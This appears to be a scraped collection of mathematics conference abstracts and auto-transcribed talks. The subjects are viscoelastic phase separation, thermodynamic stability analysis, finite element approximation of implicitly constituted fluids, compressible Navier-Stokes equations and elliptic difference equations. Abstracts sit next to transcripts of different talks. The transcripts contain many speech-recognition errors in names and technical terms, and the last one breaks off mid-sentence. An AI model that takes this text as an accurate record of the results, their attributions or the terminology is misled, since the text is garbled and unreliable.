Mathematical modelling and numerical simulations of phase separation becomes much more involved if one component is a macromolecular compound. In this case, the large molecular relaxation time gives rise to a dynamic coupling between intra-molecular processes and the unmixing on experimentally relevant time scales, with interesting new phenomena, for which the name â viscoelastic phase separationâ has been coined. Our model of viscoelastic phase separation describes time evolution of the volume fraction of a polymer and the bulk stress leading to a strongly coupled (possibly degenerate) cross-diffusion system. The evolution of volume fraction is governed by the Cahn-Hilliard type equation, while the bulk stress is a parabolic relaxation equation. The system is further combined with the Navier-Stokes-Peterlin system, describing time evolution of the velocity and (elastic) conformation tensor. Under some physically relevant assumptions on boundedness of model parameters we have proved that global in time weak solutions exist. Further, we have derived a suitable notion of the relative energy taking into account the non-convex nature of the energy law for the viscoelastic phase separation. This allows us to prove the weak-strong uniqueness principle and consequently the uniqueness of a weak solution in special cases. Our extensive numerical simulations confirm robustness of the analysed model and the convergence of a suitable numerical scheme with respect to the relative energy.
10.14288/1.0398136 (DOI)
First, what I mean by stability. So imagine that in your system you have a steady state and you introduce a perturbation and if the steady state is stable, then the perturbation should decay in time and you will recover the steady state, right? So this means that the two solutions that are starting from different initial conditions, they are approaching each other as time goes to infinity, right? So just a warning, this is not the concept of continuous dependence of thermodynamical processes upon initial state and supply term. This is the thing that is used in the theory of hyperbolic systems and that typical result is that the two solutions that are starting from two different initial conditions, they are diverging at most exponentially fast, right? So here I want something stronger, I want the solutions to approach a common limit. And of course, if you have such a physical system that looks stable, then the question is whether you can prove such a behavior from the governing equations and preferably would like to use some thermodynamical concepts. Because when you are developing models, you always claim that the model is thermodynamically consistent and it makes it far superior than other models. So you would like to use that hard work that was done in the derivation of the model in some qualitative analysis of the system, right? So now I will show you that it's possible. So concerning stability, there are basically two types of systems that are thermodynamically isolated systems and in these systems everything is easy, straightforward and boring, right? So isolated systems means that you have a fluid inside the vessel and there is no thermal energy exchange with the surrounding and no mechanical energy exchange with the surrounding. And what you expect if you have some flow inside such a vessel or deformation, whatever it is, as T goes to infinity, you will finally end up with spatially homogeneous fields. Velocity will be equal to zero and the temperature field will be constant in space. So regarding the application of thermodynamical methods in the stability analysis in this simple case, everything is clear. All you have to do is to follow this quotation, right? So this comes from Clausius. So the energy of the world, world means thermodynamically isolated system, right? So this is the translation. It's constant and the entropy of the world is rising, right? So this verbal statement gives you a kind of first guess on what should be your Lyapunov functional in the system. So your Lyapunov functional maybe is the entropy, the net entropy in the system, and then you have to enforce all the constraints, right? So the conservation of energy, constant mass in the case of polymers, the number of polymeric particles and so on and so on. And what is important here that this Lagrange multiplier here that is enforcing the conservation of energy, this is known to be one over temperature. And why it works? So if you differentiate this thing in time, then you know the entropy is rising. So minus entropy is decreasing and this is constant, these are constant terms. So you get minus derivative of entropy and this has a sign. So this is a nice guess. But in practice, it can be quite complicated, but in recent years, we have spent a lot of time in identification of energy storage ability in materials and entropy production ability in materials, right? So we know for a wide class of viscoelastic rate type fluids, what should be there as the energy and what should be there as an entropy production, right? So some of these formulas were known before and some of these formulas, especially for the viscoelastic rate type fluids with stress diffusion or some more exotic models, we have done it in our group, right? And while how it is related to Professor Rajakopal, so he's the person who kind of suggested this approach, right? So every material is characterized by its energy storage ability and entropy production ability. And we know how to write down the entropy, the energy and so on. So we can plug it into this function and we can try whether it works. So that's good, but in practice, you are not interested in thermodynamically isolated systems, right? So it makes no sense, right? So we are interested in systems that are allowed to interact with the surrounding. So what you can expect here, so you have thermodynamically open systems. So this is the system where you have mechanical energy exchange with the surrounding and thermal energy exchange with the surrounding. So you have some non-trivial flow pattern inside the vessel. And if you introduce a perturbation, basically two things can happen. The perturbation will die out and the original flow pattern is recovered or other scenario could be okay. So if you introduce a perturbation, then the perturbation will grow in time. Somehow it arranges the flow in such a way that it sucks the energy from the outside environment and it has enough energy to change the flow pattern inside. And maybe a new steady pattern will emerge. So the typical examples here are really Bernard convection, Taylor-Couette flow and so on. So the systems with external forcing. And the problem here from the thermodynamically perspective is that you can't guarantee that the net entropy, so it means the entropy of the whole system is increasing because you have fluxes, right? So the system can throw the entropy away or it can transport the energy or entropy out from its surroundings inside to the system. And you have no prior control on the fluxes. So it means that the final point here that you have a conservation of energy and the entropy is rising in this thing, it won't work. But still something can be done. This is a trick that was probably introduced in a rather cryptic form in this paper. So we can try to work with a fine correction of your function that works for the spatially homogeneous steady state. So basically if you know what is the right function for the spatially homogeneous steady state, so for the thermodynamically isolated system, you can have a kind of guess what should be the right function for the thermodynamically open system. What can work as a Lyapunov function? And well in practice, so the formula is here. So again, if you know what is the internal energy in the system, what is the entropy, what are the entropy production processes, then you can take it and substitute it to this formula and you can check whether it works. And I will show you that it really works using, let's say, two case studies, right? So in what follows, I will always assume that I can work with a classical solution. It's a disclaimer, right? It will make things easier, but not too much. So first case studies, the problem of elastic turbulence, so what it is, you have your polymer solution and the polymer solution is placed in a gap between two plates. The top plate is rotating and you have a flow pattern in between the plates. And what you observe in experiment is the following, right? So you will, the top plate will rotate rather slowly, so your Reynolds number will be 0.7, so very small. But still, you will see a kind of turbulent flow pattern. It has all the properties of turbulent flows, right? But at such a small Reynolds number. And the reason for that, why is it called elastic turbulence is that the fluid in between two plates is not just an ordinary fluid, it's a polymeric solution. So it means it has some elastic response, right? And this elastic part of the polymer solution, it induces another non-narrating in the governing equations and the transition to turbulence is triggered by this new non-narrating. It's not a non-narrating that is measured by the Reynolds number, so it's not a convective term, but it's something else I will show you. Right? So let us assume that we have governing equations. It's not too much important what is here, but what is worth of remembering is that your Cauchy stress is now something that you are familiar with from Navier-Stokes plus some extra part. And this extra part, this is a tensile quantity, so matrix 3 times 3. And this matrix is governed by its own evolution equation. And in that evolution equation, this triangle, this is some operator, but the important thing here is that you have a non-narrating here, right? And in a sense, the strength of this non-narrating is measured by the Weissenberg number. This is the other dimensionless parameter that you have in the system. So we can try to follow the guidelines or the ideas I have shown you. So you know what is the Helmholtz free energy, you know what is the entropy production, you know everything, so we can build your function. So again, notation V hat, this is some non-trivial steady state. So you have some steady velocity field, this is spatially inhomogeneous. You have some spatially inhomogeneous distribution of that tensile quantity B kappa P and the tilde means perturbation, right? And if you substitute into the formula I've shown you, then the candidate for the Lyapunov function is this one. So regarding the velocity, it's the standard thing, it's L2 norm of the velocity perturbation, but regarding the perturbation in that quantity B kappa P tilde, this is what you get is this expression, right? So this is positive and it vanishes if and only if B kappa P tilde is equal to zero, right? But it's not something like L2 norm of B kappa P tilde, right? So it's something much more complicated and if you use this quantity and do the algebra, then you will end up with the following formula for the time derivative of that function. So what is shown in red are terms that are negative, right? And what is shown in black are terms that do not have sign a priori. But you see that you are fine, right? So this is quadratic in the perturbation, this is in the velocity, this is quadratic in that quantity B kappa P and these are just, let's say, products of B kappa P and d tilde, right? So if you are lucky, if these terms are strong enough, so it means if Reynolds number is small enough and Weisenberg number is small enough, you can absorb these terms into the negative terms and you are done. So this was the derivative and there's another important ingredient here in this business. If you want to use this quantity that is shown here as a Lyapunov functional, you need a relation between this expression and a kind of distance in the state space. And what is another important ingredient is that you have to define the distance in a convenient way. And in this setting, what is important is that this quantity B kappa P, so this is the quantity that is governed by this evolution equation, it's a symmetric positive definite matrix. So you need to use this piece of information in your definition of the distance to equilibrium, right? So if you have two positive definite matrices, symmetric positive definite matrices, there are several ways how to define the distance between these matrices. And if you choose the right one, well, so we were lucky, so this one worked, right? So I can say about it. So but you are exploiting kind of structural property that is behind the equations, right? So using this concept of distance, it really works as a Lyapunov function. So just the results for Taylor-Couet flow, so this is this setting, we are able to show that if you are in a safe range of parameters Reynolds Weissenberg, that if we are here, then any initial perturbation will decay to zero, so we'll recover the steady solution. It's just a sufficient condition so far. So this is one case study. Another one is, let's say, boring from the physical point of view, but maybe more interesting from the mathematical point of view. So this is a problem of vessel with walls kept at non-uniform temperature. So we know what to do in isolated vessels. So if you have no heat exchange, so zero Neumann boundary condition and zero mechanical energy exchange, then what you, and you have a fluid inside such a vessel, so what you expect at the long-time behavior will be the zero velocity field and a spatially homogeneous temperature field. So that's it. First open system is very simple, so you still have no mechanical energy exchange, so you expect that the velocity will decay to zero, but now you will have Dirichlet data for temperature, right? So we are not controlling fluxes. We are controlling just the temperature, but the temperature is spatially homogeneous, so this is just a number. So this is called thermal bath. And in this case, again, the expected long-time limit is that the velocity is equal to zero and temperature is spatially homogeneous because it's compatible with this boundary condition. And now, a slightly more general setting is the same thing, but now the temperature on the boundary is spatially inhomogeneous. This is a function of position, right? And here, the expected long-time limit is zero velocity again, but the temperature field will be spatially inhomogeneous. It will be a solution of steady heat equation. So if the fluid inside is just the standard Navier-Stokes fluid, so these are the governing equations, these are the boundary conditions. And this is the steady state, so zero velocity, and the temperature is a solution to the steady heat equation, right? So this is spatially inhomogeneous data. And what you expect is that if you perturb this state, then arbitrary perturbations should decay to zero, right? So V tilde and theta tilde should go to zero. And the point is that if you are not able to show that this follows from the governing equation, this is such a simple system, then if you are not able to show that, then probably you can't do anything sensible with the governing equations. So where's the problem? Regarding the velocity, it's easy, right? So it's known from fifties even earlier. So you test formally by the velocity field, and you will get this evolution equation for the velocity, and you know that the velocity decays. Regarding the temperature, the situation is much more complex or much more difficult, because the thing that helps you to kill the kinetic energy appears as a source in the equation for the temperature, right? So the kinetic energy disappears, but it not disappear, but it's converted to the thermal energy. So you have a source here, and you don't know where, when and where the source is triggered. You don't know the fluxes through the boundary. If the velocity is small, then it's not through the d small. So all kinds of problems. So in principle, you want a method where you should use just this piece of information, right? So the amount of dissipated energy, of dissipated kinetic energy is finite, nothing more. Well, in this simple case, you can do something, but imagine that for our complex fluids, for viscoelastic fluids, instead of just 2 mu Gd, you have something more complex, right? So there is no hope to do something with this one, except that it has a sign. And now another question is how to measure the size of the temperature perturbation. So again, the L2 norm of temperature perturbation is not a good idea, right? Because the evolution equation for the temperature perturbation is this one. So this is fine. This is fine. But you have no control on this one, right? So the temperature perturbation could be both positive and negative, so you don't have the sign and you can't get bound on this one. But still you can show something. What I will show you is that you can get this result. So this is kind of, let us think, that this is a convex function in theta tilde divided by theta hat in a point-march sense. So this goes to zero. And from this, you can conclude that the relative entropy goes to zero in any Lp space. So I will show you later how to do this. So the critical point here is the following lemma, right? So assume that you know that you have a function that has a finite integral from t0 to infinity. And you want to show that the limit of that function y is zero. So this is not possible because the counter example is, for example, something like this one. So that's fine. But if you add something to this, if you kind of add a condition that does not allow the thin peaks to build up, then this one plus this one implies this behavior, this limit behavior. So you can tend the crank and you will substitute to the functional. And what you will get is something like this. So this is your functional. You should investigate. This follows from thermodynamics. The troublemaker term now disappears in a sense that it has a sign here. So OK, fine. It's negative. Maybe even we can't exploit this one. But who cares? Because we can work with this one. And now the only problem is to find a match between the right-hand side here and the expression that appears in the formula for the Lyapunov function. So you must have the same quantity on the left and the right-hand side. So now this is a little bit tricky. So basically what you will exploit is the fact that the stability should not depend on the choice of temperature scale. If you are using Kelvin's, you should get the same result. If you are using degree Celsius, you should get the same result. And another temperature scale will also work. So it leads you to the following renormalization if you want of the evolution equation for the temperature. It's kind of a crazy algebraic manipulation, but it works. And you will get a whole family of functionals, and you can combine them. And if you combine them, you will get this quantity. And this is perfect for the lemma I have shown you. So we can conclude that this goes to zero, and this also implies that the relative entropy, so this is this thing with logarithm here, it goes to zero in the LP space and the LP space. So it's a conclusion. So while there's a thermodynamic framework for stability analysis of open systems, and I guess that I have shown you that it works in relatively complex settings for incompressible viscovastic radar fluids, and that's it.
Analysis of finite amplitude stability of fluid flows is a challenging task even if the fluid of interest is described using the classical mathematical models such as the Navier--Stokes--Fourier model. The issue gets more complicated when one has to deal with complex models for coupled thermomechanical behaviour of non-Newtonian fluids; in particular the viscoelastic rate-type fluids. We show that the knowledge of thermodynamical underpinnings of these complex models can be gainfully exploited in the stability analysis. First we introduce general concepts that allow one to deal with thermodynamically isolated systems, and then we proceed to thermodynamically open systems. Next we document the applications of these concepts in the case of container flows (thermodynamically isolated systems), and in the case of flows in containers with non-uniformly heated walls (mechanically isolated but thermally open system). We end up with mechanically driven systems such as the Taylor--Couette flow.
10.14288/1.0398149 (DOI)
It's really kind of invitation. It's really unfortunate that we can't be in Canada at the moment. We have to do this over the internet. So as you can see from the title page, this talk to like, Joseph's talk is dedicated to Raj who celebrates his birthday today. My work over the last few years has been really strongly influenced by things that I have learned from Mira and Joseph in Prague about Raj's work. So as you can see from the title, the talk concerns the analysis and the approximation of implicitly constituted fluid flow models. So let me just list a few papers to begin with. So concerning the physical background, I think the key papers are the two that you see on the top by Raj and Raj and Srinivas from 2006 and 2008, which concern the physical foundations of implicit constitutive theory. There's been subsequent work on the mathematical analysis of partial differential equations that arise in these models. And these are the papers from which I have learned a lot about the mathematical analysis. There's been subsequent work about the mathematical analysis of these equations. So if you looked at the mechanical literature and the mathematical analysis literature, you would see quite a substantial body of work. Concerning numerical analysis, I think the literature, I think it's fair to say is really thin. So what is listed here is what I'm aware of in terms of the analysis of numerical methods. And I don't mean computations. I mean the mathematical analysis of numerical methods for partial differential equations that arise in these implicitly constituted fluid flow models. So there's a range of papers running through starting from steady flows up until time-dependent problems and heat equation coupling in these equations and so forth. But since this is just a short talk, I decided to concentrate on a simple model, a steady problem, which is the one that you see here. So you have a bounded Lipschitz domain in Rd and we're thinking of physical dimensions. So d is 2 or 3. You have conservation or balance of linear momentum equation, which looks like Navier-Stokes, except for one fact that the stress tensor, the shear stress tensor, will not be linearly related to the symmetric velocity gradient. This would be the case for Navier-Stokes, but there will be a nonlinear relationship between them. And as Joseph explained in the previous talk, they will be related through an implicit relationship, which is written here. So going back to the equation, so u is the velocity, as usual, p is the pressure. You have a source term perhaps on the right hand side. We are looking at the incompressible case, so divergence u is equal to 0 and then some boundary conditions. So maybe in the simplest possible case, the velocity is equal to 0 on the boundary of this domain. So s here is going to be assumed for physical reasons to be symmetric and trace free. So the same notation here in the subscript corresponds to being symmetric and the 0 corresponds to being trace free. So this is related to the fact that s and d are in a certain relationship and d has a trace 0 because the trace of d of u is precisely divergence and divergence u is equal to 0 by assumption. So it is assumed here that g is defined on the Cartesian product of rd cross d seems 0 crossed with itself and it maps into the same set. So there will be certain assumptions on this graph or this implicit constitutive relation. So what is assumed here that you can identify this implicit constitutive relation with a graph. So s and d are in a functional relation if and only if this pair d, s, this pair of matrices lies in the graph and then certain structural assumptions are made on the graph which I listed here. So for physical reasons it is assumed and that's the first assumption that the point 0 is 0, that is when d is 0 and s is 0, so the point 0 is 0 is in the graph. So the second assumption is monotonicity of the graph which is what you see here. So if you could somehow visualize in your mind the coordinate system where the horizontal axis is the d-axis and the vertical axis is the x-axis then this would correspond to monotonicity in that ds coordinate system. So the third assumption, maximal monotonicity, is a technical assumption simply expresses the fact that there are no gaps in the graph which is assumed to be monotone and the fourth assumption which in some form also arose in Josef's talk is going to be quite important in the analysis. It is a lower band on the scalar product of these two matrices s and d is assumed to be bounded below by a positive constant that multiplies the matrix norm of d raised to a certain power r and similarly for s raised to the whole der conjugate r prime. So incidentally as Mira was saying in the beginning, I think the arrangement is that you are allowed to interrupt me at any point, correct Mira? Yes. Okay, so if you have questions please stop me because otherwise it feels like talking to a blank screen. So here are some examples of these implicit constitutive relations. So if you have a linear relationship between the shear rate, so this is the symmetric velocity gradient and the shear stress. If you have a linear relationship you have a Newtonian fluid, you could have a shear thickening fluid, you could have a shear thinning fluid, you could have something like a Bingham fluid which is this graph here which is continuous as a graph but it's discontinuous as a function but it's a monotone graph and then you could have this upper curve here which would correspond to pseudo plastic fluid with a yield or Herschel-Balkley fluid. So all of these are covered by these monotone graphs that I described in the previous slide. So concerning numerical approximation, how do you go about this? Well the first step in the construction of the numerical method is we regularize the graph because this graph could be potentially a graph that exhibits a jump. So what is done is you consider measurable selection from this graph and you modify this by convolving with some kind of compactly supported function theta n which is in L1. So you end up with a graph which is a modified graph, it is this red graph. There are other possibilities for smoothing the graph such as this Yoshida regularization but in any case you have some sort of smoothing of the graph as the first step. So then the next step in the construction is to discretize the problem and what it means to discretize the problem is to replace the infinite dimensional problems that appear in the weak formulation of the partial differential equation with suitable finite dimensional subspaces and in this particular method that we are considering here, we are thinking of finite element methods and finite element method use piecewise polynomial spaces on triangulations of the domain. So you take your computational domain whatever it may be, you triangulate it obviously not by hand using an automatic mesh generator and then you choose finite dimensional spaces for the velocity, this is v sub h, h simply stands for the granularity of the discretization grid, the mesh size to v h for the velocity and q h for the pressure and these guys are contained in suitable infinite dimensional spaces whatever the space for the weak solution was this w1r with perhaps zero Dirichlet boundary condition and for the pressure, so it's some Lebesgue space and the zero subscript signifies the fact that it is assumed that the integral average of the pressure is equal to zero, zero is not zero boundary condition yet zero integral v and so then there are some standard assumptions on these finite dimensional spaces in order to be able to talk about convergence as you pass the limit and what appears here just to point out so when you are working with w1r for reasons the technical reasons that come up in the analysis, the appropriate space for the pressure is lr with a tilde where r tilde is this funny object here defined by these formally so it's not quite the whole that conjugates of r, it's sort of slight modification depending on how small r is, so for small values of r you need to replace the whole that conjugate with a different number but in any case so then okay so once you've got your finite dimensional spaces you need to think ahead a little bit in terms of what you want to do next and so one of the big hurdles in the construction of finite element methods for incompressible fluids is the fact that you have to in some sense satisfy the divergence u equal to zero constrained so if you have reasonably smooth solutions you can satisfy this in a piece in a point-wide sense but if you are working with finite dimensional approximations of the velocity field it's not clear whether you can ensure that divergence u is equal to zero point-wise and you can see from this slide the trouble that is caused by the fact if the view is not equal to zero point-wise so let me just run through what would happen if the view was zero point-wise so in you would look at your weak formulation you take formally your test function to be the velocity field itself you would perform integration by parts so this term is what would arise from the convective term this is what would arise from the pressure term and if the view is point-wise zero both of these blue terms would cancel so that's very nice you would drop the blue terms so then using the structural assumption number four which puts a lower bound on s scalar du you get a lower bound on this integral in terms of norms here and on the right hand side you perform a Cauchy-Schwarz inequality or Heldner inequality or whatever you want to call it the definition of this negative sub-leve norm to get a bound on the right hand side and you simply kick back this du of u into the left hand side then you have a nice energy estimate on the solution in terms of the data so if you are after an analysis of a numerical method for this problem you have to mimic this process and the problem is that the view need not be point-wise zero so the question is how do you mimic this process if you don't have a point-wise divergence free velocity field so what you could do for sure and this is what is done in finite element approximations of incompressible flow is to at least ensure that this property is true so divergence of the velocity field u h now this is the approximate velocity field when tested against q h's which come from your approximate pressure space this is what is required to be zero so this can be done and there are loads of finite element spaces i mean the whole zoo of finite element spaces which can happily achieve this property there are not so many finite element spaces that can ensure that dv u h is point-wise equal to zero there are some finite element spaces for example this scott bogelius or more recently guzman nieland finite element spaces that ensure a point-wise divergence free property so we'll distinguish two cases in the analysis in one case option a is that you have this discrete satisfaction of dv u h equal to zero and option b is you use some special finite element functions where dv u h really is point-wise equal to zero so then in case a if you are working with these approximately divergence free functions the problem is that the first blue term i had on the previous slide is not going to be equal to zero because setting this term equal to zero does really rely on the fact that u h is point-wise divergence free and this you don't have so there is a fix to this in the nevy stokes literature finite element approximation of nevy stokes equations which is to replace the original object that you are dealing with here so replace divergence u tensor v dotted with w which is the term that would derives from the convective term in the nevy stokes equation with this term that you see here so another tri-linear form so the original tri-linear form is replaced by another tri-linear form and this will always have the property that if the three entries are the same then this b expression is equal to zero which is precisely what you want and this will happen irrespective of whether u h is point-wise divergence free or not point-wise divergence free and this tri-linear form is also consistent with the original tri-linear form in the sense that if dv u happens to be equal to zero then this modified tri-linear form collapses back to the original tri-linear form so basically there are these two situations one has to think about when you have approximately divergence free finite element functions and point-wise divergence free finite element functions obviously in the second case this modification is not required so here's the convergence theorem that can be proved so you have a numerical method where instead of the stress tensor you have this modification through the graph you have this modification of the tri-linear form arising from the convective term this is the approximation of the pressure term after integration by parts and then you have a source term and then down here in the second line you have this discrete imposition of the divergence u equal to zero constrained so this is the numerical method and the theorem says the following in case a when you are working with these approximately divergence free functions as long as r is so this is the r the index that arises in the graph in the in the xcm4 in the graph if r is greater than 2d over d plus one you have convergence of your numerical approximation to weak solution of the problem whereas in case b when you are really point-wise divergence free you can further lower this r to almost the critical case 2d over d plus two so I think when r is equal to 2d over d plus two this is a critical situation when the convective term is in is in l1 and and and so sort of that's the limit that how far you can go so in any case so as n tends to infinity so this is the modification in the graph going to infinity h the mesh size is going to zero you have convergence of your sequence of numerical approximations to a weak solution there's no uniqueness of weak solutions at this stage and this weak solution satisfies the weak formulation as you would expect so mirai am i right in thinking that i still have five minutes yes definitely okay okay so let me just in those five minutes let me just give you a few ideas of how the proof works because I love this proof some of it is inherited from this or from these papers by Mira Piotr Joseph and Agnieszka which concerns the proof of existence of weak solutions so they use a Galerkin method but the Galerkin method that is used in the construction of or the proof of the existence of weak solutions uses smooth Galerkin basis functions and obviously here the situation is completely different because you are working with piecewise polynomial functions there's certain tricks that you can do with small smooth Galerkin approximations doesn't work when you are using a piecewise polynomial functions so in any case the first step one in the proof is you pass to the limit with your modification on a fixed grid so the finite element spaces are fixed you let the modification tend to infinity and by using basically the estimates which are similar to the ones that I showed you for the Navier-Stokes equation you have a bound on the sequence of numerical approximations and usual arguments you can pass the limit this d-u-n-h lives in a finite dimensional space so boundiness of the sequence automatically implies strong convergence of d-u-n-h to d-u-h as n the graph approximation goes to the limit and for the second guy you have boundedness but this comes now from an infinite dimensional space so all you can say is that it goes to a weak weekly converges to a limit which is to be identified and then using the monotonicity of the graph and Minty's method you can identify this weak limit to be precisely s of d-u-h so this pair d-u-h as d-u-h in a sense lives on a graph so in the second step you now want to send h to zero so how do you do this well you go back to the previous estimate that you have and then by weak law or semi continuity you deduce from this as you send n to infinity that you still have an upper bound on these limiting objects which is this one here so now you have a bounded sequence d-u-h in lr so you can extract weekly convergent uh subsequence which goes to d-u and once again because you have a bound on this s-d-u-h in lr prime it weakly converges to something and there's something you don't know what it is you would like to say that this s-bar there's something you have converged to weakly is s of d-u but this is not clear so what you would like to show is that this pair d of u and s-bar lies on the graph or if almost everywhere in omega or in other words that s-bar what you have converged to is s of d-u so we come to step three so to show that this pair lies on the graph you consider this object here this is a signed object because of monotonicity it is non-negative and so using these various bounds that you have from the previous step simply by her there's inequality when you integrate the absolute value in fact the absolute value is not even necessary because this is non-negative that you get a bound on this by a constant simply by her there's inequality so then you have a bound in l1 on this guy now unfortunately l1 is not reflexive yours I've also mentioned this in his talk but you are still not completely dead with the argument there is a nice result the chacon biting lemma that you as I mentioned which allows you to consider nested sequence of domains contained in omega and which exhausts the whole of omega such that the discrepancy between omega and these nested domains shrinks to zero and you have weak convergence on in l1 on the sequence of these nested domains which is a consequence of this bound via chacon's biting lemma so one final thing that is missing here is because you have weak convergence you have therefore equity integrability of the sequence if you could manage to show almost everywhere convergence of this sequence perhaps to zero that would provide some helpful information so this is really the next step so you once again look at this guy that you looked at in the previous step and one step that is now really specific to the numerical method and here one deviates from the argument that is in the PD analysis papers where a lipshy truncation is used going back to a cherubic fusco there's a refined version of this result in deaning malek and steinhauer this was not available in the finite element literature so what we had to do in order to complete this discussion is develop sort of a finite element counterpart of this lipshy truncation method which is contained in this paper with Lars deening and christian kreuzer so I don't want to go through the technicalities of it the long and short of it is that by using this lipshy truncation method it is possible to prove that this object a sub h that I considered on the previous slide converges to zero almost everywhere in omega so on the one hand you have weak convergence of this a h on the other hand you have almost everywhere convergence of a h in omega so by appealing to vitali's theorem you can use that for that a h strongly converges to zero in l one on these nested sequence of domains so this is good news now this is almost the end of the proof because we already have weak convergence of s du h to s bar from step two and we also have weak convergence of du h to d also from step two and if you combine these two pieces of information with what is written here in line two you can deduce this equality here and once you have this equality you can appeal to the property of maximal monotonicity of the graph to deduce from all of the things that you have that du s bar does indeed lie on the graph almost everywhere on this nested sequence of domains but then by a diagonal procedure because these nested domains exhaust the whole domain you can deduce that du this pair s bar really is contained in the graph almost everywhere you know so you have therefore identified the limit of the sequence of these stress approximations that du s bar does lie on the graph and that is basically at the end of the proof so I'm almost out of time I knew I would be out of time there are lots of numerical simulations that we did let me just show you one and that's my last slide it slightly relates to what Joseph was saying earlier on so what is I think fantastic about this implicit constitutive theory it allows really all sorts of weird and wonderful fluid models so look at this one here so d here is d of u this is the symmetric velocity gradient and you have a model where d is possibly one over two mu s so you have a may you may have a linear relationship between d and the shear stress on some part of the domain and in this example this domain where you have d being equal to one over two mu s is the complement of this circle so you think of a circle in this domain in the complement of that circle so basically near the boundary you have nebius stokes and inside the circle you could have s equal to zero so you would be down to an Euler model incompressible Euler model as long as the magnitude of d is below a certain threshold and if d is above a certain threshold you have a sort of a genuinely non-Newtonian model with implicit relationship or a nonlinear relationship between d and s so there are lots of examples in this paper that is cited at the bottom of the slide in some general numerical analysis with Patrick Ferron my colleague here in Oxford and Alexey Gaskarosco who is in Erlangen at the moment and he was our joint student in Oxford so I think out of time so thank you very much indeed for your attention
We prove the existence of global weak solutions à la Leray for compressible Navier-Stokes equations with a pressure law which depends on the density and on time and space variables t and x. The assumptions on the pressure contain only locally Lipschitz assumption with respect to the density variable and some hypothesis with respect to the extra time and space variables. It may be seen as a first step to consider heat-conducting Navier-Stokes equations with physical laws such as the truncated virial assumption. The paper focuses on the construction of approximate solutions through a new regularized and fixed point procedure and on the weak stability process taking advantage of the new method introduced by the two first authors with a careful study of an appropriate regularized quantity linked to the pressure.
10.14288/1.0397353 (DOI)
All right. So thank you everyone for coming after wonderful weekend. It's a pleasure to have a salute talk about different equations over a field of elliptic functions. Okay. So thank you very much for inviting me to give a talk in this conference. I am a newcomer to the field of different equations. Actually, I was exposed to it about three years ago and I heard in Montreal, the boys said I'm Chepsky. Give a wonderful talk about it. So thank you, Boris. And I'd like to talk about just a moment. I'm going to try something. Okay. Now it's there. Do you see it? Everybody sees the slides? Do you see the slides? Oh, you don't see the slides? Nope. They must have stopped sharing somehow. Something happened. Let me go back. Start sharing again. Do you see it now? Okay. Good. The only problem is that your face is somehow blocked the slides for me, but that's okay. Okay. Good. So I'd like to talk about different equations over fields of elliptic functions. But to start, I will go over two theorems over the rational fields, which might be well known, but let's go over them as motivation anyhow. So let capital K be the field that is obtained from the field of rational functions by extracting roots of the variable X. And I view it as a subfield of K hat, which is the field of Poisson power series that is obtained in the same way from the field of run power series. And then we have the molar operators, sigma and tau, of raising the power X to X to the P or X to the Q. And I assume that P and Q are natural numbers that are multiplicative and independent. No power of P is a power of Q, except for one. And a molar equation for a power series F in K hat is simply a linear dependence over the field K of the between the iterates of sigma on F. So that would be like a sigma molar equation. So you look at F of X, F of X to the P, X to the P squared and so on. And if they satisfy such a linear dependence, you say that you have a molar equation. And around 1987, Lockstone and van der Poetten asked, what can be said if a function, if a power series F in K hat satisfies simultaneously both P molar equation and a Q molar equation over K, and they conjectured then that it must be in fact in capital K. And this was proved about three years ago by Adam Czevsky and Bell. And I should make two remarks. First of all, it follows easily that if the coefficients are in fact in CX and F is in a run power series, then F is in CX2. So the only advantage of working with these larger fields upstairs is that sigma and tau become automorphisms rather than just endomorphisms of the fields. And the second remark is that underlying the theorem, there is the multiplicative group of C star, sigma and tau are endomorphisms of this multiplicative group. And K is really the field of rational functions on the universal covering of it in the algebraic sense. So there is even older additive analog in which we can take K to be simply C of X and K hat d loran series field. And for sigma and tau, we take instead of molar operators, P or Q difference operators. So we multiply the variable X by P and Q and again, P and Q should be multiplicatively independent. They can be any natural, any complex numbers. And then in 1992, Bezivin and Butaba proved that if F in K hat a formal power series satisfied both P difference equation and Q difference equation, then it was a rational function. So in the original theorem, there were some restrictions, they can be lifted. So this time the theorem lives on the additive group and sigma and tau are, of course, endomorphisms of the additive group. And K, again, is the function field of the universal cover, except the universal cover is the additive group itself because it is simply connected. Now, the proofs of these two theorems were quite different in use of a variety of ideas. But about a year or two years ago, Shevkin and Zinger came up with a uniform treatment of both of them, as well as of other similar results due to Rami and others that I don't have the time to survey. And this is what started me on the subject. And I should add that very recently, just three weeks ago, I think Adam Jeffsky drive just hard to win in a winter posted on the archive, a remarkable strengthening, but you'll have to wait to Sherlock's talk on Friday to hear about it. So I would like to talk about an elliptic analog. So let us introduce some notation. If lambda is the lattice in the complex numbers, I denote by K lambda the field of lambda elliptic functions, as you all know, it's generated by the complex numbers by the Varsha's Pe function and its derivative. And again, we would like to consider functions not on C mod lambda naught, but on its universal cover. So this amounts to taking the union of these K lambdas for all sub lattice is lambda for given lattice lambda. So this is our base field K. And I should mention that it really depends only on the commensurability class of lambda zero, not on number zero itself. And K hat will be again the field of Laurent power series. And we view K as a subfield of this much larger field K hat. For the operator sigma and tall, we take the elliptic P or Q difference operators. So we substitute PZ or QZ for the variable Z. But of course, to keep the ellipticity or the defective sigma and our automorphisms of K, we have to assume now that P and Q are integers. And the theorem, and again, we assume that they are multiplicatively independent P and Q. So multiplicatively independent integers. So for the main theorem, I have to make a slightly stronger assumption. I have to assume that P and Q are not only multiplicatively independent, but in fact, relatively prime. But then you take an F in K hat, the Laurent power series, you assume that it satisfies elliptic difference equations. So the same type of equations, but we're now at the coefficients, AI and VI are in the field K. Then the conclusion, you might guess that F is in K. Well, it need not be in K, but it lies in a slightly larger ring. That I call R, which is obtained from the field K by adjoining the functions Z, Z inverse, and Z as Z, where Z as Z is the Varshtras Zeta function, it's a primitive of the Varshtras pair function. It's very close to being elliptic, but it's not elliptic. It's enough to join Z of Z for one lattice. It's an easy exercise to see that once you join Z of Z for one lambda, then all the Z as Z lambda prime for all the commensurable lattices is there. So this is our ring R, and that's the conclusion. So here are a few remarks. First of all, as I said, I do not know if I can relax the assumption that P and Q need to be relatively prime. The theorem is optimal. The reason that I cannot deduce that F is in K is because in fact, any F in R satisfies a Q, an elliptic Q difference equation for any Q. And I raise a question to which I did not give an answer, but you can ask for a final result. You can say, suppose the coefficients are all in a specific K lambda. Well, what is the best lambda prime such that F is in R lambda prime, where R lambda prime is as written on the slide. Now, before I go into details or any more discussions, I want to emphasize two basic differences between the two rational cases in this similar looking elliptic case. The first is that in the two rational cases, the proof eventually goes by meromorphic continuation. You somehow show that F really represents a function that is meromorphic everywhere, and a function that's meromorphic everywhere on P1 is 